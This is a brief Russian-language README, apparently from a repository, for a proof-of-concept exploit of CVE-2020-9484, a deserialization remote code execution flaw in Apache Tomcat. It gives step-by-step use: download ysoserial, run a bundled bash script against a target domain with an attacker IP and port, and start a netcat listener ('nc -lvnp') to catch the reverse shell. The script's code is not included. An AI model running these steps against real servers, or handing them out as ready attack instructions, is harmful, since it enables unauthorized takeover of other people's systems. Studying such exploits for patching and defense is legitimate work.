
PoC для CVE-2020-9484
POC для CVE-2020-9484
Удаленное выполнение кода в Apache Tomcat через десериализацию (CVE-2020-9484)
Изучить документацию »
1. Клонируйте этот репозиторий, после чего вы сможете использовать CVE-2020-9484 и при необходимости изменять исходный код.
2. Скачайте ysoserial jar
3. Поместите CVE-2020-9484 и ysoserial.jar в одну директорию
4. Получите оболочку!
Для упрощения использования CVE-2020-9484 был написан простой bash-скрипт.
При эксплуатации вам потребуется подготовить netcat слушатель
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
